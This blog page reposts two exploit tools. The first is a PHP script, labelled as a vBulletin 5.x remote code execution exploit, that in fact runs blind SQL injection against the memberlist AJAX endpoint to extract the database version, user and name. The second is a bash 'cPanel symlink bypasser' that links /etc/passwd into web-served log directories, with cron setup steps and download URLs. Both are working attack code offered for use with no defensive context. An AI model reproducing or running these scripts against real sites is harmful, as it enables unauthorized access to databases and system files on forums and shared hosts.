[+] Wayc0de's Blog[+]

19/09/14

vBulletin 5.x Remote Code Execution Exploit

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
   
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));


    $output = curl_exec($ch);
   
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}


// Get version


print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
   
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabase: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>

Sumber  Read More...

CPanel Symlink Bypasser

#!/bin/bash
# ______ __ ____ ___
# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
# /_/ /____/_/
############################################
# CPanel Symlink Bypasser [Public Version] #
# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #
# alm3refh.com © Group XP 2014 #
############################################
#
# USAGE:
# 1. UPLOAD ME IN /home/user as Cpbypass.sh
# 2. GO TO CRON JOB
# 3. ADD THIS COMMAND:
# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com
#
# email@gmail.com = your email
#
#
# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!
# PS: ENJOY!
#
#
##########
# FILE #
##########
SYM="/etc/passwd"
########
echo ""
echo " ______ __ ____ ___"
echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"
echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "
echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "
echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "
echo " /_/ /____/_/ "
echo " CPanel Symlink Bypasser [Public Version]"
echo " By Hannibal Ksa & R3m0t3 Nu11"
echo ""
echo ""
########
rand=bypass$(( $RANDOM % 10 + 100 ));
###
# 1st 3xpl017
###
ln -sf $SYM tmp/analog/$rand.html
echo ""
echo "1st Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 2nd 3xpl017
###
ln -sf $SYM tmp/webalizer/$rand.html
echo ""
echo "2nd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 3rd 3xpl017
###
ln -sf $SYM tmp/webalizerftp/$rand.html
echo ""
echo "3rd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 4th 3xpl017
###
ln -sf $SYM logs/$rand.doc
echo ""
echo "4th Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo ""
echo "THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"
echo ""
# DONE of the public version!
# E0F
Read More...